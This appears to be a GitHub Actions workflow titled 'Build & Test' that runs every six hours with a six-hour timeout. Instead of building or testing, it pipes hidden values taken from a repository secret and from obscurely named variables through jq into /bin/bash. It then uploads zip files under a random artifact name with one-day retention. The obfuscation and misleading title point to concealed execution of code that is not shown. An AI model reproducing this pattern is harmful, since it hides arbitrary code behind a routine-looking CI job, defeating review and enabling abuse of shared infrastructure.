name: Build & Test
on:
  workflow_dispatch:

  schedule:
    - cron: '5 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          qs0234: ${{ secrets.qs0234 }}
        run: |
          printf '%s' "$qs0234" | jq -r .efsoc36637 | /bin/bash
          printf '%s' "$dv090" | jq -r .qj9801 | /bin/bash
          printf '%s' "$mg84483" | jq -r .q16 | /bin/bash
          echo $nau9397 | jq -r .tmcp06 | /bin/bash
          echo $thpst53 | jq -r .doach690 | /bin/bash
          printf '%s' "$mdlat59972" | jq -r .cd5229 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: X7VYzFcI
          path: "*.zip"
          retention-days: 1
